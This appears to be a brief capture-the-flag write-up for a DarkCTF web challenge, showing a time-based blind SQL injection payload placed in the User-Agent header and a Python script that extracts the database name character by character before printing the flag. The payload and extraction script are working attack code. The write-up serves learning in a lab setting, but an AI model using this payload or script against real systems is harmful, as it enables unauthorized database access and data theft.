Rating:

I using burpsuite to manipulate http requests, so i can use time based injection
![](https://miro.medium.com/max/700/1*C-d_1pXRcJb3w6LomHQwMA.png)

i added ' to user agent, trying to make my payload working
```
tes',IF(MID(DATABASE(),(1),1) = 'a', SLEEP(3), 0),'test')-- -
```

and i make python script
```
#!/usr/bin/env python3

import requests
import time
import json

alpha = [chr(x) for x in range(0x61,0x7b)]
for x in range(0,10):
alpha.append(str(x))
alpha.append("_")

req = requests.Session()
data = {"uname":"admin","passwd":"admin","submit":"Submit"}

for x in range(1,35):
for c in alpha:
st=time.time()
headers = {"User-Agent":f"tes',IF(MID(DATABASE(),{x},1) = '{c}', SLEEP(3), 0),'inersin')-- -"}
req.post("http://agent.darkarmy.xyz/",data=data,timeout=10, headers=headers)
if int(time.time()-st) >= 3:
print(c)
break
```
![](https://miro.medium.com/max/632/1*kmVc7oDyYHN6Oi-2Tbp8xA.png)

this is the result
> Flag: darkCTF{ag3nt_u_1s_v3ry_t3l3nt3d}

[my blog](http://medium.com/@InersIn)